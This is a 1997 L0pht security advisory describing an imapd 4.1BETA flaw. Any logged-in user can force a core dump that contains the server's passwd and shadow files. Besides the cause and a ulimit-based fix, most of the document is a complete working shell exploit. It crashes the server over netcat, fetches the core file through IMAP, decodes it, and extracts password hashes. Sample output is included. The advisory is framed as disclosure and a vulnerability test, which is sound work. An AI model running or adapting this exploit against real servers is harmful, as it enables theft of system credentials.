Advisory released Oct 8 1997
Application: imapd (imap-4.1BETA from the
IMAP 4.1 toolkit from University of Washington)
Severity: any user with an account
can remotely grab the shadowed password file.
Author: mudge@l0pht.com
http://www.l0pht.com/advisories.html
Scenario:
It is possible to crash the imapd server in several possible places.
Due to the lack of handling for the SIGABRT signal and the nature
of the IMAP protocol in storing folders locally on the server; a core dump
is produced in the users current directory. This core dump contains the
password and shadow password files from the system.
Example:
./imap_core.sh
usage: imap_core.sh target username password
./imap_core.sh target jdoe letmein
imap_core.sh -
this is a quick proof of concept tool that causes some imapd
implementations to dump core. Unfortunately the core file
contains the password and shadow password file in it!
.mudge [mudge@l0pht.com]
[Starting]
Built base64 decoder...
Running imap attack...
Forced server to dump core. Reconnecting to grab file and clean up!
Stripping trailing c/r from RFC822 base64 encapsulated core file
Removing imap crap from beginning and end of core.24487
Converting base64 image to binary core file...
core.24487: ELF 32-bit MSB core file SPARC Version 1, from 'imapd'
Successfully grabbed some form of password file for target.com
results located in ./etc_passwd.target.com
Successfully grabbed some form of shadow file for target.com
results located in ./etc_shadow.target.foo.bar
[note: some manual cleanup of ./etc_shadow.target.com is probably required]
[Finished]
Description:
In several situations it is possible to make the imapd server call
the function fatal() which is as follows in osdep/unix/ftl_unix.c:
/* Report a fatal error
* Accepts: string to output
*/
void fatal (char *string)
{
mm_fatal (string); /* pass up the string */
syslog (LOG_ALERT,"IMAP toolkit crash: %.100s",string);
abort (); /* die horribly */
}
If SIGABRT is caught and the signal handler does not return, things
would be okay, life would go on, and Frank Zappa's death would be
a big sick joke. However, SIGABRT is not caught or ignored. Since part
of the beauty of the IMAP protocol is that you can maintain your
mailboxes on the server, your directory must be writable by at least
yourself. What happens when SIGABRT is not caught, not ignored, and
the current direcorty is writable? core dump.
Here are just a few of the areas where fatal() is called.
c-client/mail.c: if (stream->lock) fatal ("Lock when already locked");
c-client/mail.c: if (!stream->lock) fatal ("Unlock when not locked");
imapd/imapd.c: if (quell_events) fatal ("Impossible EXPUNGE event");
osdep/unix/fs_unix.c: if (!block) fatal ("Out of free storage");
osdep/unix/fs_unix.c: fatal ("Can't resize free storage");
osdep/unix/env_unix.c: if (myUserName) fatal ("env_init called twice!");
osdep/unix/dummy.c: fatal ("Impossible dummy_copy");
Solution:
There are several places where imapd can be forced to abort(3C). There
are also several ways to prevent each area. As opposed to forcing our
preferred way of fixing the code and thus precluding potentially more
ellegant patches we choose to suggest a blanket solution. This should
allow the author of the application to fix these problems as he sees fit
while alerting everyone (good and bad) of the problem and a stop-gap fix
in the mean time.
This said, we recommend that core dumps not be permitted from any application
running out of inetd. If you need to test these things do so in a controlled
environment. No production machine should be allowed to crap all over the
place. "But wait!", You say, "what if we think the application is robust
and then realize there is a problem later on. We need that core file". Face
it, there are very few people out there that know what to do with core
files other than rm(1) them. However, if this is the case then you
sved yourself some heartache. Now that you know the application is not
ready for prime time you can pull it back into a controlled environment
and attempt to make it dump core again.
For Solaris you can set the core dump size via the bourne shell's built-in
ulimit command.
/etc/init.d/inetsvc should contain the line ulimit -c 0 directly above the
line starting off inetd.
---excerpt snip---
ulimit -c 0
/usr/sbin/inetd -s
--- excerpt snip---
Don't forget to kill inetd and re-run the inetsvc script.
Other OS's should check if their bourne shell has a built in ulimit and
if not, follow whatever methods are used on their particular system to
prevent core dumps or limit their size to 0.
You can use the following script to test if you are vulnerable or to check
that your fix worked. [note: you will need netcat for the script,
netcat available from http://www.avian.org and other fine fast food
establishments ]
Exploit code:
------cut here------
#!/bin/sh
# mudge@l0pht.com
#
# A quick little tool that shows the dangers of priveledged programs dumping
# core.
#
# Shout outs to a bunch of people - in particular Nettwerk.
# Hey Nettwerk where'd ya go?
# Programs
NC=/usr/local/bin/nc
CAT=/bin/cat
RM=/bin/rm
GREP=/bin/grep
TAIL=/bin/tail
HEAD=/bin/head
MV=/bin/mv
TR=/bin/tr
STRINGS=/bin/strings
FILE=/bin/file
CC=/usr/local/bin/gcc
# temporary command and storage files
CMDS1=nc_commands1
CMDS2=nc_commands2
DECODE64_SRC=b64.c
TMPNAM=vunlklyname
TMPFILE=tmp.$$
# compiled BASE64 decoding program
DECODE64=./b64
# core file - sometimes base64 sometimes actuall dump file
CORE=core.$$
if [ $# != 3 ] ; then
echo "usage: `basename $0` target username password"
exit
fi
echo
echo "[L0pht Heavy Industries - l0pht.com]"
echo "`basename $0` - "
echo " this is a quick proof of concept tool that causes some imapd"
echo " implementations to dump core. Unfortunately the core file "
echo " contains the password and shadow password file in it!"
echo " .mudge [mudge@l0pht.com]"
echo
# command line supplied variables
TARGET=$1
USER=$2
PASS=$3
# resultant password and shadow files
PASSWD=./etc_passwd_$TARGET
SHADOW=./etc_shadow_$TARGET
# the following logs in in plaintext as opposed through X AUTHENTICATE -
# you have been forwarned...
# login with $user $pass
# create a folder that probably isn't there
# select the folder
# copy the file to another name
# the above will cause IMAP4rev1 to crash via calling dummy_copy
# note: there are many other ways to get this thing to crash.
cat > $CMDS1 << FOEFOE
1 LOGIN $USER $PASS
2 CREATE $TMPNAM
3 SELECT $TMPNAM
4 COPY $TMPNAM $TMPNAM.$$
FOEFOE
# login with $user $pass (again in plaintext...)
# select the core file
# retrieve the core file base64 encoded as per RFC822
# delete the core file
# delete the temporary file we created
# bye bye
cat > $CMDS2 << FOEFOE
1 LOGIN $USER $PASS
2 SELECT core
3 UID FETCH 1 (UID RFC822.SIZE RFC822)
4 DELETE core
5 DELETE $TMPNAM
4 LOGOUT
FOEFOE
# The following quick little program to decode base64 was yanked in
# big chunks from Dave Winer's code sitting on
# http://www.scripting.com/midas/base64/source.html
# hey, credit where it's due - Dave saved me some time here.
# modest changes by: mudge@l0pht.com
cat > $DECODE64_SRC << FOEFOE
#include <stdio.h>
#define TRUE 1
#define FALSE 0
void decodefile(FILE *, FILE *);
int main(int argc, char *argv[]){
FILE *fin, *fout;
if (argc > 3){
printf("Usage: %s <infile> <outfile>\n", argv[0]);
exit(1);
}
switch(argc){
case 3:
fin = fopen(argv[1], "r");
fout = fopen(argv[2], "w");
if (!fin || !fout) {
perror("fopen");
exit(1);
}
break;
case 2:
fin = fopen(argv[1], "r");
fout = stdout;
if (!fin) {
perror("fopen");
exit(1);
}
break;
case 1:
fin = stdin;
fout = stdout;
break;
}
decodefile(fin, fout);
close(fin);
close(fout);
exit(0);
}
void decodefile(FILE *fin, FILE *fout) {
short charctr;
int breakout;
unsigned char ch;
unsigned char inbuf[3], outbuf[4];
short bufctr = 0, ignore, eot = 0;
while ((ch = fgetc(fin))) {
if (feof(fin)){
close(fin);
break;
}
ignore = FALSE;
if ((ch >= 'A') && (ch <= 'Z'))
ch = ch - 'A';
else if ((ch >= 'a') && (ch <= 'z'))
ch = ch - 'a' + 26;
else if ((ch >= '0') && (ch <= '9'))
ch = ch - '0' + 52;
else if (ch == '+')
ch = 62;
else if (ch == '=')
eot = TRUE;
else if (ch == '/')
ch = 63;
else
ignore = TRUE;
if (!ignore) {
charctr = 3;
breakout = FALSE;
if (eot) {
if (bufctr == 0)
break;
if ((bufctr == 1) || (bufctr == 2))
charctr = 1;
else
charctr = 2;
bufctr = 3;
breakout = TRUE;
}
inbuf[bufctr++] = ch;
if (bufctr == 4) {
bufctr = 0;
outbuf[0] = (inbuf[0] << 2) | ((inbuf[1] & 0x30) >> 4);
outbuf[1] = ((inbuf[1] & 0x0F) << 4) | ((inbuf[2] & 0x3C) >> 2);
outbuf[2] = ((inbuf[2] & 0x03) << 6) | (inbuf[3] & 0x3F);
fprintf(fout, "%c%c%c", outbuf[0], outbuf[1], outbuf[2]);
}
if (breakout)
break;
}
}
}
FOEFOE
$CC -o $DECODE64 $DECODE64_SRC
if [ ! -x $DECODE64 ] ; then
echo "failed to compile base 64 decoding utility"
echo "stop"
$RM -f $DECODE64_SRC $DECODE64
exit
fi
echo "[Starting]"
echo "Built base64 decoder..."
echo
echo "Running imap attack..."
$CAT $CMDS1 | $NC -w 10 $TARGET 143 > $TMPFILE
grep -i "server crashing" $TMPFILE > /dev/null
if [ $? -eq 0 ] ; then
echo
echo "Forced server to dump core. Reconnecting to grab file and clean up!"
$CAT $CMDS2 | $NC -w 10 $TARGET 143 > $CORE
$RM -f $CMDS1 $CMDS2 $TMPFILE
echo "Stripping trailing c/r from RFC822 base64 encapsulated core file"
# interesting... I must've missed the section of rfc 1521 that stated
# they'd make this DOS'ish
$TR -d '\015' < $CORE > $CORE.2 # strip off ^M's from file
$MV -f $CORE.2 $CORE
else
echo "Failed to crash server... cleaning up"
$RM -f $CMDS1 $CMDS2 $TMPFILE $DECODE64 $DECODE64_SRC
exit
fi
echo "Removing imap crap from beginning and end of $CORE"
VAR=`grep -n "^$" $CORE | awk -F: '{print $1}'`
VAR=`expr $VAR + 1`
$TAIL +$VAR $CORE > $TMPFILE
VAR=`grep -n "=" $TMPFILE | awk -F: '{print $1}'`
$HEAD -$VAR $TMPFILE > $CORE
$RM $TMPFILE
echo
echo "Converting base64 image to binary core file..."
$DECODE64 $CORE $TMPFILE
$MV $TMPFILE $CORE
$FILE $CORE
$STRINGS - $CORE | $GREP ':x:' > $PASSWD
$STRINGS -n 13 - $CORE | $GREP ':' | $GREP -v ' ' | $GREP -v ':x:' > $SHADOW
if [ -s $PASSWD ] ; then
echo
echo "Successfully grabbed some form of password file for $TARGET"
echo " results located in $PASSWD"
else
echo "failed to create $PASSWD"
$RM -f $PASSWD
fi
if [ -s $SHADOW ] ; then
echo "Successfully grabbed some form of shadow file for $TARGET"
echo " results located in $SHADOW"
echo " [note: some manual cleanup of $SHADOW is probably required]"
echo
else
echo "failed to create $SHADOW"
echo
$RM -f $SHADOW
fi
$RM -f $DECODE64 $DECODE64_SRC
$MV -f $CORE core_${TARGET}
echo "[Finished]"
------cut here------
mudge@l0pht.com
---------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
http://www.l0pht.com/advisories.html
---------------